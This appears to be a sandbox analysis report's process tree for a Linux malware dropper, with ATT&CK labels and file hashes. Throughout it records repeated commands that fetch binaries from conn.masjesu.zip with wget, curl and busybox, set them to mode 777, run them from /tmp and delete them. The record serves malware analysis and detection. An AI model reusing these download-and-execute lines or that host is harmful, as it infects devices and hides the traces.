/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- System Network Configuration Discovery
PID:943
-
-
/bin/chmodchmod 777 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr./BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵PID:946
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵PID:947
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵PID:950
-
-
/bin/chmodchmod 777 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya./1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵PID:953
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- System Network Configuration Discovery
PID:954
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵PID:957
-
-
/bin/chmodchmod 777 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8./dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵PID:960
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵PID:961
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- System Network Configuration Discovery
PID:964
-
-
/bin/chmodchmod 777 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s./RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- System Network Configuration Discovery
PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵PID:971
-
-
/bin/chmodchmod 777 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T./g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- System Network Configuration Discovery
PID:974
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- System Network Configuration Discovery
PID:975
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- System Network Configuration Discovery
PID:978
-
-
/bin/chmodchmod 777 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1./R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵PID:981
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- System Network Configuration Discovery
PID:982
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- System Network Configuration Discovery
PID:985
-
-
/bin/chmodchmod 777 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs./GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵PID:988
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- System Network Configuration Discovery
PID:989
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:990
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- System Network Configuration Discovery
PID:992
-
-
/bin/chmodchmod 777 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- File and Directory Permissions Modification
PID:993
-
-
/tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z./JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- Executes dropped EXE
PID:994
-
-
/bin/rmrm JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵PID:995
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- System Network Configuration Discovery
PID:996
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:997
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- System Network Configuration Discovery
PID:999
-
-
/bin/chmodchmod 777 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- File and Directory Permissions Modification
PID:1000
-
-
/tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF./Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- Executes dropped EXE
PID:1001
-
-
/bin/rmrm Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵PID:1002
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- System Network Configuration Discovery
PID:1003
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1004
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- System Network Configuration Discovery
PID:1006
-
-
/bin/chmodchmod 777 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- File and Directory Permissions Modification
PID:1007
-
-
/tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j./tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- Executes dropped EXE
PID:1008
-
-
/bin/rmrm tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵PID:1009
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97